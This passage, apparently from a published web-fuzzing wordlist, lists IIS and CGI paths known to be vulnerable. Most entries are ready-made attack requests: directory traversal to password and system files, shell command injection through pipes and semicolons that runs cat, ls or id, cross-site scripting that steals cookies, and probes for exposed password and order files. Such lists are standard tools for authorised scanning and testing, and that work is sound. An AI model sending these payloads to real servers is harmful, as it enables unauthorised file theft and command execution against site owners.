/iisadmpwd/aexp3.htr&lt;br /&gt;
/iisadmpwd/aexp4.htr&lt;br /&gt;
/iisadmpwd/aexp4b.htr&lt;br /&gt;
/iisadmpwd/anot.htr&lt;br /&gt;
/iisadmpwd/anot3.htr&lt;br /&gt;
/iiasdmpwd/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/scripts/fpcount.exe&lt;br /&gt;
/scripts/cgimail.exe&lt;br /&gt;
/scripts/tools/newdsn.exe&lt;br /&gt;
/scripts/tools/getdrvs.exe&lt;br /&gt;
/scripts/convert.bas&lt;br /&gt;
/cgi-bin/htmlscript&lt;br /&gt;
/scripts/counter.exe&lt;br /&gt;
/scripts/no-such-file.pl&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/index.shtml&lt;br /&gt;
/x.htw&lt;br /&gt;
/x.ida&lt;br /&gt;
/x.idq&lt;br /&gt;
/cgi&lt;br /&gt;
/scripts/iisadmin/ism.dll?http/dir&lt;br /&gt;
/scripts/samples/search/webhits.exe&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
